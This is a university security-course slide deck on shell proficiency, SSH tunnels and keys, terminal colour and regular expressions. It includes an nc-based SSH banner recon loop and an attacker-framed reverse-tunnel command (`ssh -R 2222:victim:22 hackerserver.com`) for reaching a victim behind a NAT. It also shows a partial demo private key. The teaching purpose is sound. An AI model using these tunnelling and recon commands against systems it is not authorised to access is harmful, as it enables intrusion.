06 Shell
Fall 2024
Shell Proficiency and Data Manipulation
Tyler Bletsch
Duke University
Motivation
• Everyone needs to manipulate data!
• Attackers need to:
▪ Scan target environment for assets
▪ Catalog and search target assets for possible vulnerabilities
▪ Inspect binaries for specific instruction patterns
▪ Extract specific data for processing by other tools (e.g. extracting password
hashes from a user database)
• Defenders need to:
▪ Scan own environment for assets and malicious entities
▪ Catalog own inventory and compare against known vulnerabilities
▪ Inspect traffic and data for known attack signatures
▪ Extract specific data for processing by other tools (e.g. summarizing login
failures to update a firewall blacklist)
Fundamental approach: UNIX Philosophy
• Combine simple tools to get complex effects
• Each tool does one thing and does it well
• Basic format of information is always a byte stream and usually text
• Core ingredients:
▪ Shell (e.g. bash)
▪ Pipes and IO redirection
▪ A selection of standard tools
• Bonus ingredients:
▪ SSH trickery
▪ Regular expressions (HUGE!)
▪ Terminal magic (color and cursor control)
▪ Spreadsheet integration
▪ More...
The bash shell and common Unix tools
The bash shell
• Shell: Most modern Linux systems use bash by default, others exist
▪ We’ll use bash in our examples
1 Okay, I wanted to remain objective, but I had to use PowerShell recently, and I haven’t seen a more deranged shell interface in my life, and that includes MS-DOS from the 1980s. It’s so verbose! Commands equivalent to bash are more than
twice as long. The default output format to files is UTF-16 Little Endian, a format that absolutely no sane piece of software expects to consume by default. Worse, if you look up and memorize the foot-long incantation to make it UTF-8, it insists
on writing a Byte Order Marker (BOM) as the first three bytes of every file, which makes most normal programs choke even on that. So what are you left with? You can ask it to write ASCII, which works, but why are we having to fall back to a
1960s character standard? The most galling part is that UTF-8 doesn’t even need a byte order marker, because UTF-8 is a stream of single bytes with no byte order to get wrong. It’s insane. Don’t even get me started on what it takes to
redirect a bare list of files to a file (something ls can do by default). Ugh. What is wrong with Microsoft? The entire rest of the planet gets along fine with UNIX-derived shells, but they had to reinvent the wheel, intentionally and snobbishly
ignoring 100% of what came before. Well guess what you get when you do that? Weird garbage. Sorry if you like it. I mean, cool for you I guess?
Shell basics review
• Standard IO: stdin, stdout, stderr
• Pipes: direct stdout of one command to stdin of another
ls | sort -r # sort files reverse order
Stuff from Homework 0 that I assume you know
• echo
• cat
• head
• tail
• less
• grep
• diff
• wc
• sort
• find
Note: The guy who did the Lynda video, Scott Simpson, has more videos. See
Learning Bash Scripting for examples of some of the stuff in this lecture.
Bash syntax
• Expansions:
▪ Tilde (~) is replaced by your home directory (try “echo ~”).
~frank expands to frank’s home directory.
▪ Braces expand a set of options: {a,b}{01..03} expands into 6 arguments:
a01 a02 a03 b01 b02 b03
▪ Wildcards: ? matches one char in a filename, * matches many chars,
[qwe0-3] matches just the chars q, w, e, 0, 1, 2, or 3.
• Non-trivial uses! Find all Makefiles two dirs lower: */*/Makefile
▪ Variables are set with NAME=VALUE. Values are retrieved with $NAME.
Names usually uppercase. Fancy expansions exist, e.g. ${FILENAME%.*} strips the
filename extension and ${FILENAME##*.} gets it; see here for info. Variables can
be made into environment variables with export, e.g. export NAME=VALUE.
• Quotes:
▪ By default, each space-delimited token is a separate argument
(different argv[] elements)
▪ To include whitespace in a single argument, quote it.
• Use single quotes to disable ALL expansion listed above: '|{ool'
• Use double quotes to keep $ expansions (variables, $(COMMAND)) but disable the rest: "$NAME is |{ool"
• Or backslash to escape a single character: \$1.21
Bash syntax (2)
• Control and subshells
for NAME in WORDS... ; do COMMANDS; done
• Execute commands for each member in a list.
`COMMAND` or $(COMMAND)
• Evaluate to the stdout of COMMAND, e.g.:
USERNAME=`whoami`
Control flow examples
• Keep pinging a server called ‘peridot’ and echo a message if it fails
to ping.
while ping -c 1 peridot > /dev/null ; do sleep 1 ;
done ; echo "Server is down!"
(Can invert by prepending ‘!’ to ping – waits for server to come up instead)
• Check to see if our servers have been assigned IPs in DNS:
for A in esa{00..06}.egr.duke.edu ; do host $A ; done
esa00.egr.duke.edu has address 10.148.54.3
esa01.egr.duke.edu has address 10.148.54.20
esa02.egr.duke.edu has address 10.148.54.27
esa03.egr.duke.edu has address 10.148.54.28
esa04.egr.duke.edu has address 10.148.54.29
esa05.egr.duke.edu has address 10.236.67.31
esa05.egr.duke.edu has address 10.148.54.30
esa06.egr.duke.edu has address 10.148.54.31
$ ls -l kit.tgz
-rw-r--r-- 1 tkb13 tkb13 771264 Sep 14 18:14 kit.tgz
Examples (2)
• Script to run the ECE650 “hot potato” project for grading:
#!/bin/bash
./ringmaster 51015 40 100 |& tee out-14-rm.log &
./player `hostname` 51015 |& tee out-14-p00.log &
./player `hostname` 51015 |& tee out-14-p01.log &
./player `hostname` 51015 |& tee out-14-p02.log &
…
./player `hostname` 51015 |& tee out-14-p07.log &
./player `hostname` 51015 |& tee out-14-p08.log &
./player `hostname` 51015 |& tee out-14-p09.log &
wait
▪ `hostname` in backticks: gets the external hostname
▪ Trailing &: runs the command in the background
▪ wait: pauses until all child processes have exited
▪ |&: shorthand for “stdout and stderr together”
More common commands (1)
• diff: Compare two files
▪ Example use: How does this config file differ from the known-good backup?
$ diff config config-backup
2d1 Second line, first column
More common commands (3)
• file: Identify what kind of file you have by its format
• Example use: Attacker pulled down an opaque file, what is it?
$ file hax.dat
hax.dat: gzip compressed data, last modified: Thu Aug 9 16:50:37 2018, from Unix
$ gzip -cd hax.dat | file -
Most programs that take a filename can take ‘-’ to mean stdin.
Examples (1)
• Quick SSH banner recon:
$ for H in `cat hostlist` ; do printf "%-30s" "$H" ; echo hi | nc $H 22 | head -n1 ; done
printf: It’s like echo, but it’s printf.
remote.eos.ncsu.edu SSH-2.0-OpenSSH_7.4
x.dsss.be SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
dsss.be SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10
reliant.colab.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
davros.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
esa00.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
esa01.egr.duke.edu SSH-2.0-OpenSSH_7.6p1 Ubuntu-4
storemaster.egr.duke.edu SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Examples (2)
• Download all the course notes (well, all linked PDFs):
$ wget -r -l1 -A pdf http://people.duke.edu/~tkb13/courses/ece560/
$ find
Default behavior prints everything below here in the directory tree – a quick way to check what we got.
.
./people.duke.edu
./people.duke.edu/~tkb13
./people.duke.edu/~tkb13/courses
./people.duke.edu/~tkb13/courses/ece560
./people.duke.edu/~tkb13/courses/ece560/slides
./people.duke.edu/~tkb13/courses/ece560/slides/01-intro.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/02-overview.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/03-networking.pdf
./people.duke.edu/~tkb13/courses/ece560/slides/04-crypto.pdf
./people.duke.edu/~tkb13/courses/ece560/resources
./people.duke.edu/~tkb13/courses/ece560/resources/appx
./people.duke.edu/~tkb13/courses/ece560/resources/appx/C-Standards.pdf
./people.duke.edu/~tkb13/courses/ece560/resources/appx/F-TCP-IP.pdf
./people.duke.edu/~tkb13/courses/ece560/resources/appx/I-DomainNameSystem.pdf
./people.duke.edu/~tkb13/courses/ece560/homework
./people.duke.edu/~tkb13/courses/ece560/homework/homework0.pdf
./people.duke.edu/~tkb13/courses/ece560/homework/Ethics Pledge.pdf
Examples (3)
Search a big directory tree for a file in old dBase format
• Using find’s -exec option:
$ find -exec file '{}' ';' | grep -i dbase
./server01-back/dat/cust20150501/dbase_03.dbf: FoxBase+/dBase III DBF, 14 records * 590, update-date 05-7-13, at offset 1025 1st record "0507121 CMP circular 12"
-exec will run a command for each file found, with {} as the filename, terminating the command with ‘;’.
• Using xargs with null delimiters to deal with filenames with spaces:
$ find -print0 | xargs -0 file | grep -i dbase
./server01-back/dat/cust20150501/spacey filename.dbf: FoxBase+/dBase III DBF, 14 records * 590, update-date 05-7-13, at offset 1025 1st record "0507121 CMP circular 12"
Both find’s output and xargs’s input are set to null-delimited instead of whitespace delimited.
Advanced uses of SSH
Advanced SSH: Tunnels
• Secure Shell (SSH): We know it logs you into stuff and is encrypted.
It does WAY MORE.
• SSH tunnels: Direct TCP traffic through the SSH connection
▪ ssh -L <bindport>:<farhost>:<farport> <server>
• Local forward: Opens port bindport on the local machine; any
connection to it will tunnel through the SSH connection and cause
server to connect to farhost on farport.
▪ ssh -R <bindport>:<nearhost>:<nearport> <server>
• Remote forward: Opens port bindport on server; any connection to
it will tunnel back through the SSH connection and the local machine will
connect to nearhost on nearport.
▪ ssh -D <bindport> <server>
• Dynamic proxy: Opens port bindport on the local machine. This port
acts as a SOCKS proxy (a protocol allowing clients to open TCP
connections to arbitrary hosts/ports); proxied connections exit from the
server side. Browsers and many other apps support the SOCKS protocol.
• Easy way to punch into or out of a restricted network environment.
Advanced SSH: Tunnel examples
• Example local forward:
▪ You want to connect to an app over the network, but it doesn’t support encryption
and/or you don’t trust its security.
▪ Solution:
• Set app daemon to only listen on loopback connections (127.0.0.1) port 8888
• SSH to server with local forward enabled:
ssh -L 8888:localhost:8888 myserver.com
• Connect your client to localhost:8888 instead of myserver.com:8888.
All traffic is tunneled through encryption; access requires SSH creds.
• Example remote forward:
▪ You’re an attacker with SSH credentials to a machine behind a NAT. You have an
exploit that lets you run a command on another machine behind the NAT.
▪ Solution: SSH to a server you control with a reverse SSH forwarder:
ssh -R 2222:victim:22 hackerserver.com
• Can then connect to hackerserver.com’s loopback port 2222 to get to victim.
• Example dynamic proxy: Turn it on. Set browser to use it. Surf via server.
▪ Bypass censorship, do web-admin on a restricted network, tunnel through a NAT, etc.
Advanced SSH: Keys
• You’re used to using passwords to log in. That’s...decent.
Advanced SSH: Key generation
• Create key pair:
$ ssh-keygen
(can provide various options, but the defaults are OK)
Generating public/private rsa key pair.
Enter file in which to save the key (/home/tkbletsc/.ssh/id_rsa): mykey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in mykey.
Your public key has been saved in mykey.pub.
The key fingerprint is:
SHA256:kywUn3nyI+LHOnsOYND5+FY7qIaTS+Ta0bXVjGTVY3Y tkbletsc@FREEMAN
The key's randomart image is:
+---[RSA 2048]----+
| . .. |
| . . o + = E |
| . o . B .o o |
| . + + O |
| . + = S = |
| o o = O + . |
| +o. B = |
| ++..o.+.. |
|. o+. o=. |
+----[SHA256]-----+
Advanced SSH: Key files
• Examining the keys:
$ cat mykey
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAq6vZKqVSLfZoiXd6yEgu3ZdLO/gv8mBaepWvJbISe5YKQw63
dBqnLAZc0rJcoqzHgwBjddWUyzDh7g7+MZYgf+n+xE+3QDchqdrktPxj96TMfWUZ
tH1tpY1UNdbIStAhMbGr/L6aKFs/Ouk5RhWw+GPA7N1diATD0SYibTqdG5+JQqGn
...
/4zTb3GDiXFIY9+raaFZ1XLJKBzfhi3ED4ga3nqmeKK60CDTvx8QbA==
-----END RSA PRIVATE KEY-----
$ cat mykey.pub
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQCrq9kqpVIt9miJd3rISC7dl0s7+C/yYFp6la8l
shJ7lgpDDrd0GqcsBlzSslyirMeDAGN11ZTLMOHuDv4xliB/6fuJK0D4BCFbhD8Y2eGh
TZ/l/g9uIwIv7merL+UQduCSKvqLo1X4JYsI5VSkNKCjcLo7lJoCOUazqmttkX2EBSGd
3VYp97Eu3XC3rqDAa/FnUe3E4w8nHLk9mB6/qbyr tkbletsc@FREEMAN
Advanced SSH: Key usage
• Authorizing a key:
▪ Copy only mykey.pub to the remote machine you want to establish access to
▪ On remote machine, add it to ~/.ssh/authorized_keys:
$ cat mykey.pub >> ~/.ssh/authorized_keys
Advanced SSH: Commands
• Can give a command with ssh to only do that command (no
interactive session). Stdin/stdout/stderr are tunneled appropriately!
▪ Really works great with passwordless keys!
Advanced SSH: SCP, SFTP, and Rsync
• Almost any SSH server is also a file server using the SFTP protocol.
The scp command is one way to use this.
▪ Copy a file to remote home directory:
$ scp file1.txt username@myserver:
▪ Copy a directory to remote server’s web root:
$ scp -r dir1/ webadmin@myserver:/var/www/
• Can also use a tool called rsync to copy only changes to files
▪ Here’s the script I use to update the course site:
echo COLLECTING COURSE SITES
rsync -a --delete-delay ./ECE560/website/ ./www/courses/ece560/
rsync -a --delete-delay ./ECE250/website/ ./www/courses/ece250/
Brief terminal history
• Original terminal: the teletype machine
▪ Based on typewriter technology
▪ It’s why we say “carriage return” and “line feed”
• Then came: the serial terminal
▪ CRT display with basic logic to speak serial protocol
▪ Many hooked up to one mainframe
▪ Needed new codes to do new things like
“clear screen” and “underline” without breaking
compatibility
• Now we have: terminal emulators like xterm
▪ Even more codes to do color, cursor movement, non-scrolling regions, etc.
Terminal control sequences: Color!
Why bother?
• Making output visually distinctive can greatly accelerate a task!
• Tester for ECE650 root kit: which would you rather use?
Simple example – make errors obvious
for testnum in {0..15} ; do
    if ./dotest $testnum ; then
        echo "test $testnum: ok"
    else
        echo -e "\e[41mtest $testnum: FAIL!\e[m"
    fi
done
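The same trick carries over to a scripting language. Below is a minimal Python sketch, assuming an ANSI-capable terminal; format_result is a hypothetical helper and the pass/fail values are made up, neither comes from the original tester.

```python
# ANSI escape sequences: ESC [ 41 m sets a red background, ESC [ m resets it
RED_BG = "\x1b[41m"
RESET = "\x1b[m"


def format_result(testnum, passed):
    """Return one status line; failures are wrapped in red-background codes."""
    if passed:
        return f"test {testnum}: ok"
    return f"{RED_BG}test {testnum}: FAIL!{RESET}"


# Hypothetical results, just to exercise both branches
for testnum, passed in [(0, True), (1, False)]:
    print(format_result(testnum, passed))
```

Building the string separately from printing it makes it easy to drop the color codes later, for example when output is redirected to a file.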
Also you can do cool crap
Scripting languages and
regular expressions
Regular expression material is adapted from “Regular Expressions” in “Python for Informatics: Exploring Information” by
Charles Severance at Univ. Michigan and “Regular Expressions” by Ian Paterson at Rochester Institute of Technology
Higher-level scripting languages
• Key language categories commonly used:
▪ Application: Java, C#, maybe C++
▪ Systems programming: C, maybe Rust
▪ Shell: bash (or ksh, tcsh, etc.)
▪ Scripting: Python, Perl, or Ruby
• You can do everything in bash, but it gets ugly. Things bash is
awkward at:
▪ Math
▪ Arrays
▪ Hash/dictionary data structures
▪ Really any data structures...
• Turn to scripting languages: dynamic, interpreted, compact
Scripting language key insight:
three fundamental types
• Most data manipulation tasks can be phrased as simple algorithms
against these three types:
▪ Scalar: simple value, numeric or string
▪ Array: list of values (can nest)
▪ Hash/dictionary/map: relationship between keys and values (can nest)
my %pairs = ( "hello" => 13,
"world" => 31,
"!" => 71 );
foreach my $key ( keys %pairs ) {
print "key = $key, value = $pairs{$key}\n";
}
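For comparison, here is a rough Python sketch of the same three types. The variable names greeting and primes are illustrative only; the dictionary reuses the data from the Perl %pairs example above.

```python
# Scalar: a single value, numeric or string
greeting = "hello"

# Array (list): ordered values, which can nest
primes = [2, 3, 5, [7, 11]]

# Hash/dictionary: keys mapped to values (same data as the Perl %pairs)
pairs = {"hello": 13, "world": 31, "!": 71}

# Walk the dictionary, much like Perl's "foreach my $key ( keys %pairs )"
lines = []
for key, value in pairs.items():
    lines.append(f"key = {key}, value = {value}")
print("\n".join(lines))
```

Unlike Perl hashes, Python dictionaries (3.7 and later) iterate in insertion order, so the output order here is predictable.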
▪ Idea: Go until you see two slashes in a row, then capture until you find a slash
▪ Problem: can have more than two slashes at start
▪ Idea: Go until you see two or more slashes in a row, then capture until you
find a slash
▪ Problem: What about username specifier (user@) and port number (:80)?
Regular Expressions
• Regular expressions are expressive rules for walking a string
▪ May capture parts of the string (parsing) or modify it (substitution)
▪ Like a fancy find-and-replace
Understanding Regular Expressions
• Very powerful, cryptic, and fun
• Regular expressions are a language:
▪ Based on "marker characters" - programming with characters
• We’ll use both Perl and Python examples – easy to port to others
Introduction to Regular Expressions
• Basic syntax
▪ In Perl and sed, RegEx statements begin and end with /
(This is language syntax, not the case for Python and others)
• /something/
▪ Escaping reserved characters is crucial
• /(i.e. / is invalid because ( must be closed
• However, /\(i\.e\. / is valid for finding ‘(i.e. ’
• Reserved characters include:
. * ? + ( ) [ ] { } / \ |
▪ Also some characters have special meanings based on their position
in the statement
Regular Expression Matching
• Text Matching
• A RegEx can match plain text
• ex. if ($name =~ /Dan/) { print "match"; }
• But this will match Dan, Danny, McDaniel, etc…
• Full Text Matching with Anchors
• Might want to match a whole line (or string)
• ex. if ($name =~ /^Dan$/) { print "match"; }
• This will only match Dan
• ^ anchors to the front of the line
• $ anchors to the end of the line
In Python: The Regular Expression Module
• Before you can use regular expressions in your program, you must
import the library using "import re"
• Use re.search() to see if a string matches a regex
• Use re.findall() to extract parts of a string that match your regex
• Use re.sub() to replace a regex match with another string
• Use re.split() to separate a string by a regex separator
• Example:
• if re.search(r'Dan', name): print("match")
In Python, r-quotes mean “raw string”, i.e. “don’t interpret escapes in this string”,
which makes it convenient to write Regexes which use all sorts of weird punctuation
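A quick sketch of the four functions side by side may help. The sample strings are made up for illustration.

```python
import re

name = "Danny McDaniel"

# re.search() returns a match object (truthy) or None
found = re.search(r'Dan', name) is not None

# re.findall() returns every non-overlapping match as a list
words = re.findall(r'[A-Z][a-z]+', name)

# re.sub() replaces each match with another string
masked = re.sub(r'Dan', 'Xxx', name)

# re.split() separates a string on a regex separator
fields = re.split(r'\s*,\s*', "a , b,c")

print(found, words, masked, fields)
```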
General operation
• Engine searches string from the beginning
▪ Plain text is treated literally
▪ Special characters allow more flexible matching
Regular Expression Char Classes
• Allows specification of only certain allowable chars
• [dofZ] matches only the letters d, o, f, and Z
• If you have a string ‘dog’ then /[dofZ]/ would match ‘d’ only even
though ‘o’ is also in the class
• So this expression can be stated “match one of either d, o, f, or Z.”
• [A-Za-z] matches any letter
• [a-fA-F0-9] matches any hexadecimal character
• [^*$/\\] matches anything BUT *, $, /, or \
• The ^ in the front of the char class specifies ‘not’
• In a char class, you only need to escape: \ ] - ^
Regular Expression Char Classes
• Special character classes match specific characters
• \d matches a single digit
• \w matches a word character: [A-Za-z0-9_]
• \b matches a word boundary,
e.g. /\bword\b/ catches “my word!” but not “mr. wordly”
• \s matches a whitespace character (space, tab, newline)
• . wildcard matches everything but newlines (can make it include newlines)
• Use very carefully, you could get anything!
Regular Expression Char Classes
• Character Class Examples
• /e\w\w/
• Matches ear, eye, etc
• $thing = '1, 2, 3 strikes!'; $thing =~ /\s\d/;
• Matches ‘ 2’
• $thing = '1, 2, 3 strikes!'; $thing =~ /[\s\d]/;
• Matches ‘1’
• Not always useful to match single characters
• $phone =~ /\d\d\d-\d\d\d-\d\d\d\d/;
• There’s got to be a better way…
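The character class examples above can be checked in Python. This is a small sketch using the same sample string, plus the word-boundary example from the earlier slide.

```python
import re

thing = "1, 2, 3 strikes!"

# \s\d: a whitespace character followed by a digit
first = re.search(r'\s\d', thing).group(0)

# [\s\d]: ONE character that is either whitespace or a digit
second = re.search(r'[\s\d]', thing).group(0)

# \b keeps "word" from matching inside "wordly"
hit = re.search(r'\bword\b', "my word!") is not None
miss = re.search(r'\bword\b', "mr. wordly") is None

print(repr(first), repr(second), hit, miss)
```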
Regular Expression Repetition
• Repetition allows for flexibility
• Range of occurrences
• $weight =~ /\d{2,3}/;
• Matches a run of two or three digits
• $name =~ /\w{5,}/;
• Matches any name with 5 or more word characters
• if ($SSN =~ /^\d{9}$/) { print "valid SSN!"; }
• Matches exactly 9 digits (the ^ and $ anchors rule out longer digit strings)
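One caveat is easy to test: a counted repetition without anchors is satisfied by any long-enough run inside a bigger string. The sketch below shows the difference in Python; is_nine_digits is a hypothetical helper and the inputs are made up.

```python
import re

# Unanchored: \d{9} is satisfied by any run of 9 digits inside the string
loose = re.search(r'\d{9}', "id=1234567890123") is not None


def is_nine_digits(s):
    """True only if the WHOLE string is exactly nine digits."""
    return re.fullmatch(r'\d{9}', s) is not None


# {5,} means "five or more", so a five-letter name qualifies
five_plus = re.fullmatch(r'\w{5,}', "Tyler") is not None

print(loose, is_nine_digits("123456789"), is_nine_digits("1234567890"), five_plus)
```

re.fullmatch() behaves like wrapping the pattern in ^ and $, which is usually what validation code wants.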
Regular Expression Repetition
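• General Quantifiers
• Some more special characters:
• * matches the preceding item zero or more times
• + matches the preceding item one or more times
• ? matches the preceding item zero or one time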
Regular Expression Repetition
• Greedy vs Non-greedy matching
• Greedy matching gets the longest results possible
• Non-greedy matching gets the shortest possible
• Let’s say $robot = 'The12thRobotIs2ndInLine'
• $robot =~ /\w*\d+/; (greedy)
• Matches The12thRobotIs2
• Maximizes the length of \w
• $robot =~ /\w*?\d+/; (non-greedy)
• Add a ‘?’ to a repetition to make it non-greedy!
• Matches The12
• Minimizes the length of \w
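The robot example behaves the same way in Python, as this short sketch shows.

```python
import re

robot = "The12thRobotIs2ndInLine"

# Greedy: \w* grabs as much as it can, then backs off until \d+ can match
greedy = re.search(r'\w*\d+', robot).group(0)

# Non-greedy: \w*? grabs as little as it can before \d+ matches
lazy = re.search(r'\w*?\d+', robot).group(0)

print(greedy, lazy)
```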
Regular Expression Repetition
• Greedy vs Non-greedy matching
• Suppose $txt = 'something is so cool'
• $txt =~ /something/;
• Matches ‘something’
• $txt =~ /so(mething)?/;
• Can match either ‘something’ or a bare ‘so’; here the first match is ‘something’,
and a global search also finds the second ‘so’
• Parentheses can be used for grouping (e.g. being modified by ‘?’)
and capture (covered later)
Regular Expression Real Life Examples
• Using what you’ve learned so far, you can…
• Validate an email address (note: regex below is a little oversimplified)
• $email =~ /^[\w\.\-]+@(\w+\.)*(\w+)$/
• Determine if log entry includes an IPv4 address
• /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/
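Both patterns can be tried directly in Python. In this sketch the log line and the addresses are invented test inputs, and the last check shows one way the IPv4 pattern is also oversimplified.

```python
import re

IPV4 = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
EMAIL = re.compile(r'^[\w.\-]+@(\w+\.)*(\w+)$')

# Hypothetical log entry, for illustration only
log = "Failed password for root from 10.148.54.3 port 22"
ip = IPV4.search(log).group(0)

ok = EMAIL.search("user@example.com") is not None
bad = EMAIL.search("not an address") is None

# The simple pattern also accepts out-of-range octets such as 999
accepts_bogus = IPV4.search("999.999.999.999") is not None

print(ip, ok, bad, accepts_bogus)
```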
Regex101 example
• The IP address example
Alternation
• Alternation allows multiple possibilities
• Let $story = 'He went to get his mother'
$story =~ /^(He|She)\b.*?\b(his|her)\b.*? (mother|father|brother|sister|dog)/;
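As a rough Python equivalent, the sketch below runs the same pattern and reads back which alternative each group picked.

```python
import re

story = "He went to get his mother"
pattern = r'^(He|She)\b.*?\b(his|her)\b.*? (mother|father|brother|sister|dog)'

m = re.search(pattern, story)
# Each parenthesized alternation records the option that actually matched
chosen = m.groups()
print(chosen)
```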
Grouping for Backreferences
• Backreferences (also known as capture groups)
▪ We want to know what the expression finally ended up matching
• Parentheses give you backreferences, which let you see what was matched
• Can be used after the expression has evaluated or even inside the
expression itself!
• Handled differently in different languages
• Numbered from left to right, starting at 1
Grouping for Backreferences
• Perl backreferences
• Used inside the expression
• $txt =~ /\b(\w+)\s+\1\b/
• Finds any duplicated word, must use \1 here (true in most languages)
• Used after the expression
• $class =~ /(.+?)-(\d+)/
• The text before the hyphen is stored in the Perl variable $1 (not \1)
and the number goes in $2. (This part varies between languages)
• print "I am in class $1, section $2";
• Equivalent Python:
import re
cls = "ECE560-02"
m = re.match(r'(.+?)-(\d+)', cls)
print("I'm in class " + m.group(1) + ", section " + m.group(2))
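The "inside the expression" case also works in Python with the same \1 syntax. The sketch below uses a made-up sentence, and additionally shows named groups, a Python feature (not covered in the slides) that can be easier to read than numbers.

```python
import re

# Backreference inside the expression: \1 must repeat whatever group 1 captured
txt = "Paris in the the spring"
dup = re.search(r'\b(\w+)\s+\1\b', txt)
repeated = dup.group(1)

# Named groups: (?P<name>...) lets you fetch captures by name instead of number
m = re.match(r'(?P<course>.+?)-(?P<section>\d+)', "ECE560-02")
course, section = m.group('course'), m.group('section')

print(repeated, course, section)
```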
Example: Email Headers
• Here are some email headers.
Date: Sep 15, 2018, 5:15 PM
X-Sieve: CMU Sieve 2.3
X-DSPAM-Result: Innocent
X-DSPAM-Confidence: 0.8475
X-Content-Type-Message-Body: text/plain
• Let’s write a regex to match just the X- ones:
/X-.*: .*/
Using Regex101.com to understand this
Example: Email Headers
Capturing name and value
• We still have these email headers
Date: Sep 15, 2018, 5:15 PM
X-Sieve: CMU Sieve 2.3
X-DSPAM-Result: Innocent
X-DSPAM-Confidence: 0.8475
X-Content-Type-Message-Body: text/plain
• Let’s amend our regex to capture the NAME and VALUE.
/(X-.*): (.*)/
What if we want to PARSE those headers?
• Parentheses are used to capture part of a match
Refining a regex (1)
• What if our content includes some confusing non-headers mixed in?
Refining a regex (2)
• Make regex more specific so it just matches what we want:
^(X-\S*): (.*)
▪ ^ : Must be start of line
▪ \S* : Non-whitespace characters only
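One way to actually parse the headers with this regex is sketched below in Python, using the sample headers from the earlier slide. The re.MULTILINE flag is assumed here so that ^ can match at the start of every line of a multi-line string.

```python
import re

headers = """Date: Sep 15, 2018, 5:15 PM
X-Sieve: CMU Sieve 2.3
X-DSPAM-Result: Innocent
X-DSPAM-Confidence: 0.8475
X-Content-Type-Message-Body: text/plain"""

# With two capture groups, findall() returns a list of (name, value) tuples
pairs = re.findall(r'^(X-\S*): (.*)', headers, re.MULTILINE)
parsed = dict(pairs)

for name, value in parsed.items():
    print(f"{name} -> {value}")
```

Turning the pairs into a dictionary gives direct lookup by header name, e.g. parsed["X-DSPAM-Result"].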
Grouping without Backreferences
• Sometimes you just need to make a group
▪ If important groups must be backreferenced, disable backreferencing for any
unimportant groups
• $sentence =~ /(?:He|She) likes (\w+)\./;
▪ I don’t care if it’s a he or she
▪ All I want to know is what he/she likes
▪ Therefore I use (?:) to forgo the backreference
▪ Capture group 1 will contain that thing that he/she likes
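A short Python sketch of the same idea follows; the sentence is a made-up input. The compiled pattern's groups attribute confirms that only one capture group exists.

```python
import re

sentence = "She likes regexes."
m = re.search(r'(?:He|She) likes (\w+)\.', sentence)

# (?:...) groups without capturing, so the liked thing is group 1
liked = m.group(1)
group_count = m.re.groups

print(liked, group_count)
```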
Matching Modes
• Matching has different functional modes
▪ In Perl, these are specified as letters after the regex.
• $name =~ /[a-z]+/i;
▪ i turns off case sensitivity
• $xml =~ /title="([\w ]*)".*keywords="([\w ]*)"/s;
▪ s enables . to match newlines
• $report =~ /^\s*Name:[\s\S]*?The End.\s*$/m;
▪ m lets ^ and $ match at the start and end of each line, not just of the whole string
▪ In Python, you pass an additional optional argument with named constants
(either short like the above or with full names), e.g.:
• re.search(r'[a-z]+', name, re.I) # or re.IGNORECASE
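The three modes map to re.I, re.S, and re.M in Python. The sketch below tries each one on small made-up strings.

```python
import re

# re.I (IGNORECASE): [a-z] also matches uppercase letters
ci = re.search(r'[a-z]+', "DAN", re.I).group(0)

# re.S (DOTALL): lets . match newlines
text = "start\nend"
without_s = re.search(r'start.*end', text) is None
with_s = re.search(r'start.*end', text, re.S) is not None

# re.M (MULTILINE): ^ and $ match at every line boundary
report = "Name: x\nThe End"
first_words_default = re.findall(r'^\w+', report)
first_words_multiline = re.findall(r'^\w+', report, re.M)

print(ci, without_s, with_s, first_words_default, first_words_multiline)
```

Flags can be combined with the | operator, e.g. re.I | re.M.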
Regular Expression Substitution
• Substitutions simplify complex data modification
▪ First part is a regex of what to find, second part is text to replace it
▪ Backreferences can be included in replacement
▪ For sophisticated work, most languages let you give a callback function so
that the replacement can be programmatically generated for each match
• Perl replacement syntax
▪ $phone =~ s/\D//;
• Removes the first non-digit character in a phone number
(Leaving the replacement blank means “replace with nothing”, i.e. “delete”)
▪ $html =~ s/^(\s*)/$1\t/;
• Adds a tab to a line of HTML using backreference $1
• Python uses re.sub()
Substitutions Modes
• Substitutions have modes like matches (ignore case, multiline, etc.)
• Important one: Substitutions can be performed singly or globally
▪ In Perl, use the g flag to force the expression to scan the entire string
• $phone =~ s/\D//g;
▪ Removes all non-digits in the phone number
▪ In Python’s re.sub() function, specify a count parameter to limit
replacements (e.g. count=1 for traditional “first match only” behavior)
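A small sketch of re.sub() covering the cases discussed: first-match-only, global, a backreference in the replacement, and a callback. The phone number, HTML fragment, and fruit string are invented inputs.

```python
import re

phone = "(919) 555-0100"

# count=1 mimics Perl's s/\D// (first match only)
first_only = re.sub(r'\D', '', phone, count=1)

# Default behavior is global, like Perl's s/\D//g
all_digits = re.sub(r'\D', '', phone)

# Backreference in the replacement: Python writes \1 where Perl writes $1
indented = re.sub(r'^(\s*)', r'\1\t', "  <p>hi</p>")

# Callback: the replacement is computed from each match object
doubled = re.sub(r'\d+', lambda m: str(int(m.group(0)) * 2), "3 apples, 10 pears")

print(first_only, all_digits, repr(indented), doubled)
```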
Combining one-liners and regexes
• Remember this slide when I compared color output to plain?
▪ less (Press /)
▪ Notepad++
▪ emacs: ain’t launching that thing, but you can type “C-M-s” for regex search (whatever that means)
Hey, how about Excel? That thing’s cool, right?
• Terminals are nice, but did you know: GUIs exist?
• Some tasks benefit from non-terminal interface
• Example: tabular data wants to be in a spreadsheet
• Let’s cover some quick tips on (ab)using Excel (or Google Sheets)
Data in/out
• File format for getting in/out of Excel:
Comma-Separated Values (CSV)
▪ Trivial for simple data: bob,2,19
▪ If you have commas in data, enclose in quotes: "Jimmy, PhD",4,50
▪ If you have quotes, double them up: "This is a ""quote""",7,94
▪ Save with “.csv” extension and Excel loads it right up
▪ Can generate well enough with simple commands
▪ Can use common libraries to do everything “right” (quoting, etc.); e.g. Python
has a built-in csv module
• For fast stuff, can just use the clipboard
▪ Often quick just to copy/paste instead of making actual files
▪ Format for spreadsheet <-> plaintext via clipboard is tab-separated
